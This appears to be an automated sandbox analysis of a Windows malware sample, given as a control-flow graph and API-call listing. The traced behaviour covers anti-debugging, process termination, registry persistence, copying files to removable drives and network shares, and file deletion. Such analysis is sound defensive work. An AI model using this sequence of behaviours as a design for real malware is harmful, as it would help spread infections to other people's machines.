FindNextFileA 8555->8557 8558 1441170 8555->8558 8556->8539 8557->8558 8573 1441157 8557->8573 8559 1441492 8558->8559 8564 144146f 8558->8564 8560 14414b1 FindClose 8559->8560 8561 14414bb Sleep 8559->8561 8560->8561 8561->8556 8562 144119f lstrlen 8566 14411c7 lstrcat lstrlen lstrlen 8562->8566 8562->8573 8563 144117b Sleep 8563->8562 8592 1440e71 8564->8592 8568 1441207 lstrcmpiA 8566->8568 8566->8573 8569 144121e lstrcmpiA 8568->8569 8568->8573 8569->8573 8570 14413aa lstrcpy lstrlen lstrcmpiA 8570->8573 8571 143e329 48 API calls 8571->8573 8572 1441060 71 API calls 8572->8573 8573->8557 8573->8558 8573->8562 8573->8563 8573->8570 8573->8571 8573->8572 8576 1441277 8573->8576 8578 14412f2 lstrcpy lstrcat 8573->8578 8574 143a26e 48 API calls 8574->8576 8576->8573 8576->8574 8577 144136a DeleteFileA 8576->8577 8579 1440cf6 CreateFileA 8576->8579 8577->8576 8578->8573 8580 1440d45 GetFileSize 8579->8580 8581 1440e6a 8579->8581 8582 1440e60 CloseHandle 8580->8582 8583 1440d61 GlobalAlloc ReadFile 8580->8583 8581->8576 8582->8581 8584 1440da1 8583->8584 8585 1440e56 GlobalFree 8584->8585 8586 1440dac CreateFileW 8584->8586 8585->8582 8586->8585 8587 1440ddb GetFileSize 8586->8587 8588 1440df3 GlobalAlloc ReadFile 8587->8588 8589 1440e4c CloseHandle 8587->8589 8590 1440e34 8588->8590 8589->8585 8591 1440e42 GlobalFree 8590->8591 8591->8589 8593 1448060 8592->8593 8594 1440e7e lstrcpy 8593->8594 8595 1440f03 8594->8595 8596 1440f1a lstrlen 8594->8596 8611 14344cb InterlockedExchange 8595->8611 8598 143a16b 2 API calls 8596->8598 8599 1440f34 lstrcat 8598->8599 8601 1440f76 MultiByteToWideChar CreateFileA 8599->8601 8600 1440f08 8600->8596 8602 1440f4b 8600->8602 8604 1441055 8601->8604 8605 1440fc1 lstrlenW 8601->8605 8612 14344cb InterlockedExchange 8602->8612 8604->8559 8607 144772b 8605->8607 8606 1440f50 lstrcat 8606->8601 8608 1440ff1 lstrlenW 8607->8608 8609 144772b 8608->8609 8610 1441017 WriteFile CloseHandle 8609->8610 8610->8604 8611->8600 8612->8606 8614 1448060 8613->8614 8615 1441cf0 lstrcpy GetDriveTypeA 8614->8615 8616 1441d60 8615->8616 8617 1441d7e RtlExitUserThread 8615->8617 8618 1441060 91 API calls 8616->8618 8619 1441d7b 8618->8619 8619->8617 8621 1441ea9 8620->8621 8622 1441ee8 RtlExitUserThread 8621->8622 8665 1441d8f RegOpenKeyExA 8621->8665 8624 1441ebe Sleep 8625 1441d8f 53 API calls 8624->8625 8626 1441ed8 Sleep 8625->8626 8626->8621 8628 144308c 8627->8628 8674 14344cb InterlockedExchange 8628->8674 8630 1443162 Sleep 8631 1442fff 13 API calls 8630->8631 8633 1443188 8631->8633 8632 143e329 48 API calls 8632->8633 8633->8632 8634 14431a7 Sleep 8633->8634 8639 14431b4 8633->8639 8634->8633 8635 1443744 RtlExitUserThread 8637 1442ebc 11 API calls 8638 144320b Sleep GetLogicalDrives 8637->8638 8638->8639 8639->8635 8639->8637 8640 1443734 Sleep 8639->8640 8641 1443278 GetDriveTypeA 8639->8641 8640->8639 8641->8639 8642 14432bc lstrcat CreateFileA 8641->8642 8643 1443522 GetFileAttributesA 8642->8643 8644 14432ff GetFileTime FileTimeToSystemTime 8642->8644 8646 144353e SetFileAttributesA DeleteFileA 8643->8646 8647 1443569 CreateFileA 8643->8647 8645 1443515 CloseHandle 8644->8645 8662 144333d 8644->8662 8645->8643 8712 143a2ad SHFileOperation RemoveDirectoryA 8646->8712 8647->8639 8648 1443598 GetSystemTime SystemTimeToFileTime 8647->8648 8650 143a16b 2 API calls 8648->8650 8655 1443605 8650->8655 8651 1443566 8651->8647 8652 1443372 ReadFile CharLowerA lstrlen 8654 1443509 8652->8654 8652->8662 8654->8645 8656 1443633 lstrcat 8655->8656 8657 144361f lstrcat 8655->8657 8675 14344cb InterlockedExchange 8655->8675 8676 1442b8e 8655->8676 8656->8655 8657->8655 8659 1443658 6 API calls 8659->8639 8660 14436ef WriteFile CloseHandle SetFileAttributesA 8659->8660 8660->8639 8661 1443465 lstrcpy GetFileAttributesA 8661->8654 8663 1443491 CloseHandle CreateFileA 8661->8663 8662->8645 8662->8652 8662->8654 8662->8661 8663->8654 8664 14434c9 WriteFile CloseHandle SetFileAttributesA 8663->8664 8664->8654 8666 1441de5 RegEnumValueA 8665->8666 8667 1441e89 RegCloseKey 8665->8667 8668 1441e34 8666->8668 8669 1441e29 8666->8669 8667->8624 8668->8667 8669->8668 8670 1441e36 GetFileAttributesA 8669->8670 8673 1441e48 8670->8673 8671 143e329 48 API calls 8671->8673 8672 1441e5f Sleep 8672->8666 8672->8667 8673->8671 8673->8672 8674->8630 8675->8655 8677 1442c23 8676->8677 8713 14344cb InterlockedExchange 8677->8713 8679 1442c2b 8680 1442c49 lstrcat 8679->8680 8714 1442a35 lstrlen 8679->8714 8735 14344cb InterlockedExchange 8680->8735 8683 1442c5e 8685 1442c79 8683->8685 8686 1442a35 10 API calls 8683->8686 8684 1442c46 8684->8680 8687 1442e04 8685->8687 8688 1442ca4 8685->8688 8686->8685 8744 14344cb InterlockedExchange 8687->8744 8736 14344cb InterlockedExchange 8688->8736 8691 1442e09 8692 1442e24 8691->8692 8693 1442a35 10 API calls 8691->8693 8692->8659 8693->8692 8694 1442dff 8694->8659 8695 1442ca9 8695->8694 8737 14344cb InterlockedExchange 8695->8737 8697 1442cf4 8698 1442d12 lstrcpy 8697->8698 8699 1442a35 10 API calls 8697->8699 8738 1442962 8698->8738 8701 1442d0f 8699->8701 8701->8698 8702 1442d44 8703 1442dee lstrcat 8702->8703 8742 14344cb InterlockedExchange 8702->8742 8703->8694 8705 1442d68 8706 1442d8c lstrcat 8705->8706 8707 1442d7a lstrcat 8705->8707 8743 14344cb InterlockedExchange 8706->8743 8707->8706 8709 1442da3 8710 1442db5 lstrcat 8709->8710 8711 1442dc7 lstrlen wsprintfA 8709->8711 8710->8711 8711->8703 8712->8651 8713->8679 8745 14344cb InterlockedExchange 8714->8745 8716 1442a61 8717 1442a82 8716->8717 8718 1442a73 lstrcat 8716->8718 8746 14344cb InterlockedExchange 8717->8746 8718->8717 8720 1442a87 8721 1442aa8 lstrcat 8720->8721 8722 1442a99 lstrcat 8720->8722 8747 14344cb InterlockedExchange 8721->8747 8722->8721 8724 1442abc 8748 14344cb InterlockedExchange 8724->8748 8726 1442b6e 8727 1442962 InterlockedExchange 8726->8727 8728 1442b77 lstrcat 8727->8728 8728->8684 8729 1442b08 lstrlen 8730 143a16b 2 API calls 8729->8730 8732 1442aca 8730->8732 8731 14344cb InterlockedExchange 8731->8732 8732->8726 8732->8729 8732->8731 8733 1442b37 lstrcat 8732->8733 8734 1442b5d lstrcat 8732->8734 8733->8732 8734->8732 8735->8683 8736->8695 8737->8697 8741 1442976 8738->8741 8739 1442a31 8739->8702 8740 14344cb InterlockedExchange 8740->8741 8741->8739 8741->8740 8742->8705 8743->8709 8744->8691 8745->8716 8746->8720 8747->8724 8748->8732 8750 14390b5 8749->8750 8752 1438fae 8749->8752 8750->7558 8751 1438fbc RegEnumValueA 8751->8752 8758 1438ff3 8751->8758 8752->8751 8753 1438ff5 RegDeleteValueA 8752->8753 8752->8758 8753->8751 8754 143901d RegEnumKeyExA 8755 14390ab RegCloseKey 8754->8755 8754->8758 8755->8750 8756 1439052 wsprintfA 8756->8758 8757 1439050 8757->8755 8758->8754 8758->8756 8758->8757 8759 1439084 RegDeleteKeyA 8758->8759 8759->8754 8761 1439342 lstrcat 8760->8761 8762 1439354 lstrcat lstrcat 8760->8762 8761->8762 8763 143938a 8762->8763 8763->7579 8765 14391b5 CloseHandle 8764->8765 8766 14391ae 8764->8766 8765->7585 8766->8765 8769 1439258 8767->8769 8768 14392d9 SetFileAttributesA DeleteFileA 8768->7586 8769->8768 8771 14397a0 8770->8771 8772 143978e lstrcat 8770->8772 8773 14397c4 GlobalAlloc 8771->8773 8775 14397f6 8771->8775 8772->8771 8774 14397f1 8773->8774 8774->8775 8776 1439805 lstrcat 8774->8776 8775->7561 8775->7594 8777 143a75a 10 API calls 8776->8777 8778 143984d CopyFileA 8777->8778 8779 1439881 8778->8779 8780 143986a LoadLibraryExA 8778->8780 8781 14398b1 GlobalFree GetProcAddress 8779->8781 8782 143988a LoadLibraryExA 8779->8782 8780->8779 8781->8775 8783 14398e7 8781->8783 8782->8775 8782->8781 8783->8775 8784 1439997 GlobalAlloc 8783->8784 8785 14399d1 CreateFileA 8784->8785 8785->8775 8787 1439a62 WriteFile CloseHandle GlobalFree FreeLibrary 8785->8787 8787->8775 8788 1439ab8 DeleteFileA 8787->8788 8788->8775 8790 1439ec1 8789->8790 8791 1439edc RtlExitUserThread 8790->8791 8802 1439c4f CreateToolhelp32Snapshot 8790->8802 8793 1439ecf Sleep 8793->8790 8800 143944d 8794->8800 8795 14394c7 RtlExitUserThread 8796 1439459 Sleep 8796->8800 8797 14394ba Sleep 8797->8800 8798 143948a lstrlen 8798->8797 8798->8800 8800->8795 8800->8796 8800->8797 8800->8798 8801 143946d Sleep 8800->8801 8801->8800 8803 1439eac CloseHandle 8802->8803 8804 1439cac Process32First 8802->8804 8803->8793 8805 1439cea CharUpperA 8804->8805 8806 1439db8 Process32Next 8804->8806 8812 1439d03 8805->8812 8806->8803 8807 1439dd3 CharUpperA 8806->8807 8819 1439df2 8807->8819 8808 1439d71 8808->8806 8827 1439b56 CreateToolhelp32Snapshot Module32First 8808->8827 8809 1439b56 5 API calls 8809->8819 8811 1439d8b 8811->8806 8815 1439acf 6 API calls 8811->8815 8812->8808 8822 1439acf CreateFileA 8812->8822 8814 1439acf 6 API calls 8817 1439e11 Sleep 8814->8817 8818 1439d9e Sleep 8815->8818 8817->8806 8818->8806 8819->8806 8819->8809 8819->8814 8820 1439acf 6 API calls 8819->8820 8821 1439e89 Sleep 8820->8821 8821->8819 8823 1439b32 WriteFile CloseHandle 8822->8823 8824 1439b00 OpenProcess 8822->8824 8825 1439b30 Sleep 8823->8825 8824->8825 8826 1439b1a TerminateProcess CloseHandle 8824->8826 8825->8808 8826->8825 8828 1439c37 CloseHandle 8827->8828 8831 1439bce 8827->8831 8828->8811 8829 1439c20 Module32Next 8829->8828 8829->8831 8830 1439bd7 CharUpperA 8830->8831 8831->8829 8831->8830 8832 1439c14 8831->8832 8832->8828 9328 14414a1 9329 14414ab 9328->9329 9330 14414b1 FindClose 9329->9330 9331 14414bb Sleep 9329->9331 9330->9331 9332 14414c8 9331->9332 9333 14424a1 9334 14424ab 9333->9334 9335 14424b4 CloseHandle 9334->9335 9336 14424cb 9334->9336 9335->9336 9337 14424d4 CloseHandle 9336->9337 9338 14424e1 9336->9338 9337->9338 9339 1442500 9338->9339 9340 14424ea GetProcessHeap HeapFree 9338->9340 9340->9339 8833 ab130d 8854 ab1000 8833->8854 8836 ab1495 8840 ab157d GetPEB VirtualAlloc VirtualFree 8848 ab132c 8840->8848 8843 ab157d 3 API calls 8845 ab1441 EnumWindows 8843->8845 8844 ab13dc CheckRemoteDebuggerPresent 8844->8848 8913 ab61cf 8845->8913 8979 ab1081 8845->8979 8848->8840 8848->8843 8851 ab157d 3 API calls 8848->8851 8877 ab5870 8848->8877 8886 ab1139 8848->8886 8891 ab157d 8848->8891 8902 ab11d6 8848->8902 8849 ab157d 3 API calls 8850 ab1463 Sleep 8849->8850 8850->8848 8852 ab1402 Sleep 8851->8852 8853 ab157d 3 API calls 8852->8853 8853->8848 8917 ab29e2 8854->8917 8859 ab157d 3 API calls 8860 ab1023 8859->8860 8862 ab103c 8860->8862 8923 ab62a1 8860->8923 8935 ab538c 8862->8935 8865 ab538c 3 API calls 8866 ab1071 8865->8866 8867 ab538c 3 API calls 8866->8867 8868 ab1077 8867->8868 8868->8836 8869 ab12b2 8868->8869 8870 ab5307 4 API calls 8869->8870 8871 ab12bd 8870->8871 8950 ab149b 8871->8950 8873 ab538c 3 API calls 8874 ab1308 8873->8874 8874->8848 8875 ab12c5 8875->8873 8876 ab12e6 8875->8876 8876->8848 8878 ab157d 3 API calls 8877->8878 8879 ab5889 CreateToolhelp32Snapshot 8878->8879 8880 ab589b 8879->8880 8885 ab5897 8879->8885 8881 ab157d 3 API calls 8880->8881 8883 ab58da 8880->8883 8882 ab58ca Process32FirstW 8881->8882 8882->8880 8882->8883 8953 ab2371 8883->8953 8885->8848 8888 ab11a5 8886->8888 8887 ab157d 3 API calls 8887->8888 8888->8887 8890 ab11cb 8888->8890 8956 ab58eb 8888->8956 8890->8848 8892 ab1d45 8891->8892 8893 ab1d56 8891->8893 8895 ab1d58 8892->8895 8896 ab1d4c 8892->8896 8894 ab538c 3 API calls 8893->8894 8900 ab1dba 8894->8900 8965 ab1e6e 8895->8965 8968 ab14ba GetPEB 8896->8968 8900->8844 8903 ab11e3 8902->8903 8904 ab157d 3 API calls 8903->8904 8905 ab122d QueryDosDeviceW 8904->8905 8906 ab12a9 8905->8906 8907 ab1243 8905->8907 8906->8848 8908 ab5307 4 API calls 8907->8908 8912 ab124e 8908->8912 8909 ab12a1 8910 ab538c 3 API calls 8909->8910 8910->8906 8911 ab157d 3 API calls 8911->8912 8912->8909 8912->8911 8914 ab61d5 8913->8914 8973 ab6111 8914->8973 8940 ab1e4d 8917->8940 8920 ab2bd5 8921 ab1e4d 3 API calls 8920->8921 8922 ab1015 8921->8922 8922->8859 8924 ab157d 3 API calls 8923->8924 8925 ab62ca RegQueryValueExW 8924->8925 8926 ab6319 8925->8926 8927 ab62df 8925->8927 8929 ab157d 3 API calls 8926->8929 8947 ab5307 8927->8947 8931 ab6328 RegCloseKey 8929->8931 8930 ab62e9 8932 ab157d 3 API calls 8930->8932 8931->8862 8933 ab62f9 8932->8933 8933->8926 8934 ab538c 3 API calls 8933->8934 8934->8926 8936 ab106b 8935->8936 8937 ab5395 8935->8937 8936->8865 8938 ab157d 2 API calls 8937->8938 8939 ab53a1 VirtualFree 8938->8939 8939->8936 8943 ab5353 8940->8943 8942 ab100e 8942->8920 8944 ab157d 2 API calls 8943->8944 8945 ab5363 VirtualAlloc 8944->8945 8946 ab537a 8945->8946 8946->8942 8948 ab157d 3 API calls 8947->8948 8949 ab5316 VirtualAlloc 8948->8949 8949->8930 8951 ab157d 3 API calls 8950->8951 8952 ab14aa 8951->8952 8952->8875 8954 ab157d 3 API calls 8953->8954 8955 ab2380 CloseHandle 8954->8955 8955->8885 8957 ab157d 3 API calls 8956->8957 8958 ab5904 CreateToolhelp32Snapshot 8957->8958 8963 ab5914 8958->8963 8964 ab5918 8958->8964 8959 ab157d 3 API calls 8960 ab5947 Module32FirstW 8959->8960 8961 ab5957 8960->8961 8960->8964 8962 ab2371 4 API calls 8961->8962 8962->8963 8963->8888 8964->8959 8964->8961 8966 ab5353 3 API calls 8965->8966 8967 ab1da8 8966->8967 8970 ab14fc 8967->8970 8969 ab14cd 8968->8969 8969->8893 8971 ab14ba GetPEB 8970->8971 8972 ab150d 8971->8972 8972->8893 8974 ab611e 8973->8974 8975 ab1459 8973->8975 8976 ab157d 3 API calls 8974->8976 8977 ab157d 3 API calls 8974->8977 8975->8849 8976->8974 8978 ab6141 Sleep 8977->8978 8978->8974 8978->8975 8980 ab5307 4 API calls 8979->8980 8981 ab10df 8980->8981 8982 ab157d 3 API calls 8981->8982 8986 ab10ed 8982->8986 8983 ab112a 8984 ab538c 3 API calls 8983->8984 8985 ab1131 8984->8985 8986->8983 8987 ab157d 3 API calls 8986->8987 8987->8986 9237 143d1e4 9238 143d1f4 9237->9238 9239 143d346 9238->9239 9240 143d20e 9238->9240 9250 14344cb InterlockedExchange 9238->9250 9251 14344cb InterlockedExchange 9240->9251 9243 143d273 9245 143c76b 2 API calls 9243->9245 9247 143d298 9243->9247 9244 143d232 9244->9243 9252 14344cb InterlockedExchange 9244->9252 9245->9247 9248 143b3ef InterlockedExchange 9247->9248 9249 143d336 9248->9249 9250->9240 9251->9244 9252->9243 9035 1435a6a 9038 1435a82 9035->9038 9036 1435c01 9037 1435bf4 RegCloseKey 9037->9036 9039 1435ad0 wsprintfA RegQueryValueExA 9038->9039 9040 1435b37 9038->9040 9039->9040 9040->9036 9040->9037 9253 14358e9 9258 1435901 9253->9258 9254 1435c01 9255 1435bf4 RegCloseKey 9255->9254 9256 1435962 wsprintfA 9257 1435a01 RegSetValueExA 9256->9257 9256->9258 9257->9258 9258->9256 9258->9257 9259 1435935 9258->9259 9259->9254 9259->9255 9041 14bd760 9042 14bd765 20 API calls 9041->9042 9260 14388f3 9261 143890a inet_addr 9260->9261 9264 1438906 9260->9264 9262 143892e gethostbyname 9261->9262 9263 143891d 9261->9263 9262->9264 9263->9262 9263->9264 9265 1438bf1 9273 1438a39 9265->9273 9266 1438da5 Sleep 9266->9273 9267 1438d8d Sleep 9267->9273 9268 1438cae lstrcpy 9268->9273 9269 1438db5 RtlExitUserThread 9270 1438bab Sleep 9270->9273 9272 143a75a 10 API calls 9272->9273 9273->9266 9273->9267 9273->9268 9273->9269 9273->9270 9273->9272 9274 1440945 18 API calls 9273->9274 9275 1438b2a IsBadWritePtr 9273->9275 9276 14414d9 28 API calls 9273->9276 9277 14345d2 4 API calls 9273->9277 9278 1434631 3 API calls 9273->9278 9274->9273 9275->9273 9276->9273 9277->9273 9279 1438b86 Sleep 9278->9279 9279->9273 9341 14344b1 9344 14344bb GetTickCount 9341->9344 9343 14344b9 9344->9343 9054 1434f36 9055 1434f45 9054->9055 9056 1434f52 wsprintfA 9055->9056 9057 1435085 RegCloseKey 9055->9057 9058 1434fa9 9056->9058 9059 1434f9c 9056->9059 9069 14350d2 9057->9069 9060 1435053 lstrlen RegSetValueExA 9058->9060 9061 1435030 RegSetValueExA 9058->9061 9059->9058 9062 1435007 9059->9062 9063 1434fe5 9059->9063 9067 1435215 9059->9067 9066 1435080 9060->9066 9061->9066 9065 1434a5b 2 API calls 9062->9065 9064 1434a5b 2 API calls 9063->9064 9070 1434ff4 lstrcpy 9064->9070 9068 1435016 lstrcpy 9065->9068 9068->9058 9071 14350f9 GlobalFree 9069->9071 9072 1435106 9069->9072 9070->9058 9071->9072 9345 1441ab1 9358 1441a5a 9345->9358 9346 1441c8d Sleep 9346->9358 9347 1441c77 9348 1441acf 9348->9347 9350 1441b14 lstrcpy lstrcat 9348->9350 9351 1441c51 9348->9351 9349 1441c9d GlobalFree WNetCloseEnum 9353 1441ccd 9349->9353 9354 1440b9a 7 API calls 9350->9354 9352 144195d 121 API calls 9351->9352 9355 1441c69 Sleep 9352->9355 9357 1441b47 9354->9357 9355->9347 9356 1441a79 WNetEnumResourceA 9356->9358 9359 1441c7e GetLastError 9356->9359 9357->9351 9360 1441b6b lstrcpy lstrlen 9357->9360 9366 1441be3 9357->9366 9358->9346 9358->9348 9358->9349 9358->9356 9359->9346 9361 1441c8b 9359->9361 9362 1441b96 lstrcat 9360->9362 9363 1441ba8 lstrlen 9360->9363 9361->9349 9362->9363 9365 143a16b 2 API calls 9363->9365 9364 1441c38 9364->9351 9367 1441c44 DeleteFileA 9364->9367 9368 1441bc2 lstrcat 9365->9368 9366->9364 9369 1441c0f lstrlen 9366->9369 9367->9351 9370 1440c4b 5 API calls 9368->9370 9371 1441060 91 API calls 9369->9371 9370->9366 9371->9364 9378 14390ba CreateFileA 9379 14390f2 9378->9379 9380 14390f4 WriteFile CloseHandle 9378->9380 9380->9379 9280 1434bf9 9281 1434c08 9280->9281 9282 1434c15 wsprintfA 9281->9282 9283 1434d68 RegCloseKey 9281->9283 9285 1434c60 9282->9285 9289 1434c6d 9282->9289 9284 1434d75 9283->9284 9288 1434ce5 9285->9288 9285->9289 9290 1434cbc 9285->9290 9286 1434d13 RegSetValueExA 9292 1434d63 9286->9292 9287 1434d36 lstrlen RegSetValueExA 9287->9292 9293 1434a5b 2 API calls 9288->9293 9289->9286 9289->9287 9291 1434a5b 2 API calls 9290->9291 9294 1434cd2 lstrcpy 9291->9294 9295 1434cf9 lstrcpy 9293->9295 9294->9289 9295->9289 9073 1443238 9089 14431f9 9073->9089 9074 1443734 Sleep 9074->9089 9075 1443278 GetDriveTypeA 9076 14432bc lstrcat CreateFileA 9075->9076 9075->9089 9079 1443522 GetFileAttributesA 9076->9079 9080 14432ff GetFileTime FileTimeToSystemTime 9076->9080 9077 1443744 RtlExitUserThread 9084 144353e SetFileAttributesA DeleteFileA 9079->9084 9085 1443569 CreateFileA 9079->9085 9082 1443515 CloseHandle 9080->9082 9099 144333d 9080->9099 9081 1442ebc 11 API calls 9083 144320b Sleep GetLogicalDrives 9081->9083 9082->9079 9083->9089 9102 143a2ad SHFileOperation RemoveDirectoryA 9084->9102 9086 1443598 GetSystemTime SystemTimeToFileTime 9085->9086 9085->9089 9088 143a16b 2 API calls 9086->9088 9094 1443605 9088->9094 9089->9074 9089->9075 9089->9077 9089->9081 9089->9085 9090 1443372 ReadFile CharLowerA lstrlen 9090->9099 9092 1443633 lstrcat 9092->9094 9093 144361f lstrcat 9093->9094 9094->9092 9094->9093 9095 1442b8e 18 API calls 9094->9095 9103 14344cb InterlockedExchange 9094->9103 9096 1443658 6 API calls 9095->9096 9096->9089 9097 14436ef WriteFile CloseHandle SetFileAttributesA 9096->9097 9097->9089 9098 1443465 lstrcpy GetFileAttributesA 9098->9099 9100 1443491 CloseHandle CreateFileA 9098->9100 9099->9082 9099->9090 9099->9098 9100->9099 9101 14434c9 WriteFile CloseHandle SetFileAttributesA 9100->9101 9101->9099 9102->9089 9103->9094

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 01443B60 Relevance: 121.3, APIs: 62, Strings: 7, Instructions: 599stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 0 1443b60-1443c26 call 1448060 call 1442ebc LoadLibraryA 5 1443c72-1443c8c LoadLibraryA 0->5 6 1443c28-1443c6d GetProcAddress * 3 0->6 7 1443cf1-1443d13 RegOpenKeyExA 5->7 8 1443c8e-1443cec GetProcAddress * 4 5->8 6->5 9 1443d15-1443d47 RegSetValueExA RegCloseKey 7->9 10 1443d4d-1443d6f RegOpenKeyExA 7->10 8->7 9->10 11 1443d71-1443da3 RegSetValueExA RegCloseKey 10->11 12 1443da9-1443df2 lstrcpy lstrcat RegOpenKeyExA 10->12 11->12 13 1443df4-1443e59 GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 12->13 14 1443e5f-1443e81 RegOpenKeyExA 12->14 13->14 15 1443f15-1443f3a GetWindowsDirectoryA lstrlen 14->15 16 1443e87-1443f0f RegSetValueExA * 3 RegCloseKey 14->16 17 1443f4c-1443f7a GetComputerNameA lstrlen 15->17 18 1443f3c-1443f46 lstrcat 15->18 16->15 19 1443f7c-1443fc2 lstrlen 17->19 20 1443fc9-1444007 lstrcpy GetUserNameA lstrlen 17->20 18->17 19->20 21 144401d-144403d call 144772b 20->21 22 1444009-1444017 lstrcpy 20->22 25 144404e-1444061 lstrlen 21->25 22->21 26 14440e1-14440f0 call 1440b9a 25->26 27 1444063-144406a 25->27 34 14440f2-1444117 GetTempPathA lstrlen 26->34 35 144414d-1444157 lstrcpy 26->35 27->26 28 144406c-1444099 27->28 30 14440aa-14440dc lstrlen 28->30 31 144409b-14440a4 28->31 30->25 31->30 37 1444129-1444138 call 1440b9a 34->37 38 1444119-1444123 lstrcat 34->38 36 144415d-1444167 35->36 39 1444178-144418b lstrlen 36->39 44 144413a-1444145 lstrcpy 37->44 45 144414b 37->45 38->37 41 1444205-1444250 lstrcat CreateFileMappingA call 143477f call 1436274 call 1435760 call 1435c26 39->41 42 144418d-1444194 39->42 58 1444256-144429b call 143c89a 41->58 59 1444331-1444338 call 1435760 41->59 42->41 46 1444196-14441ca 42->46 44->45 45->36 48 14441cc-14441d5 46->48 49 14441db-1444200 lstrlen 46->49 48->49 49->39 65 14442ac-14442b6 58->65 64 144433b-144435f call 1438701 call 1434d96 call 14355be lstrlen 59->64 82 1444366-1444389 64->82 83 1444361 call 143a553 64->83 67 1444325-1444327 call 1435760 65->67 68 14442b8-14442e7 65->68 73 144432c-144432f 67->73 71 144431e 68->71 72 14442e9-14442f7 68->72 71->67 72->71 75 14442f9-1444320 call 1435e86 72->75 73->64 75->65 86 1444397-14443c3 call 14344cb GetTickCount wsprintfA 82->86 87 144438b-1444395 82->87 83->82 88 14443c6 86->88 87->86 87->88 91 14443d0-14443e0 88->91 92 14443e6-14443f6 91->92 93 14444aa-14444e3 lstrcat GetSystemDirectoryA lstrlen 91->93 92->93 94 14443fc-144440b 92->94 95 14444f5-1444566 lstrcat * 2 GlobalAlloc * 2 93->95 96 14444e5-14444ef lstrcat 93->96 94->93 98 1444411-1444447 94->98 96->95 99 1444457 98->99 100 1444449-1444455 98->100 101 1444461-14444a1 lstrlen wsprintfA 99->101 100->101 102 14444a5 101->102 103 14444a3 101->103 102->91 103->93
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442EBC: RegOpenKeyExA.KERNEL32(80000001,0143244C,00000000,000F003F,?,?), ref: 01442F03
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442EBC: RegSetValueExA.KERNELBASE(?,01432488,00000000,00000004,00000002,00000004), ref: 01442F31
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442EBC: RegCloseKey.KERNEL32(?), ref: 01442F3E
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442EBC: lstrcpy.KERNEL32(00000000,01432550), ref: 01442F99
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442EBC: lstrcat.KERNEL32(00000000,01432548), ref: 01442FAC
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(01432154), ref: 01443C13
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,0143278C), ref: 01443C36
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,014327A0), ref: 01443C4E
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,014327B0), ref: 01443C67
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(01432894), ref: 01443C79
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,014328D8), ref: 01443C9C
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,014328B0), ref: 01443CB5
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,014328C4), ref: 01443CCD
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,014328A0), ref: 01443CE6
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,014321D4,00000000,000F003F,00000000), ref: 01443D0B
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(00000000,014321C0,00000000,00000004,00000000,00000004), ref: 01443D3A
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 01443D47
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,014322EC,00000000,000F003F,00000000), ref: 01443D67
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(00000000,01432328,00000000,00000004,00000000,00000004), ref: 01443D96
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 01443DA3
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,01432384), ref: 01443DB7
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,0143242C), ref: 01443DCA
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 01443DEA
                                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000200), ref: 01443E02
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01443E1C
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 01443E2C
                                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 01443E4C
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 01443E59
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,01432384,00000000,000F003F,00000000), ref: 01443E79
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,0143274C,00000000,00000004,00000000,00000004), ref: 01443EAC
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,0143275C,00000000,00000004,00000000,00000004), ref: 01443ED7
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(00000000,01432774,00000000,00000004,00000001,00000004), ref: 01443F02
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 01443F0F
                                                                                                                                                                                                                                                                                              • Part of subcall function 01440B9A: lstrcpy.KERNEL32(?,?), ref: 01440BC8
                                                                                                                                                                                                                                                                                              • Part of subcall function 01440B9A: GetTickCount.KERNEL32 ref: 01440BCE
                                                                                                                                                                                                                                                                                              • Part of subcall function 01440B9A: lstrlen.KERNEL32(?,01433D08,00000000), ref: 01440BE1
                                                                                                                                                                                                                                                                                              • Part of subcall function 01440B9A: wsprintfA.USER32 ref: 01440BEF
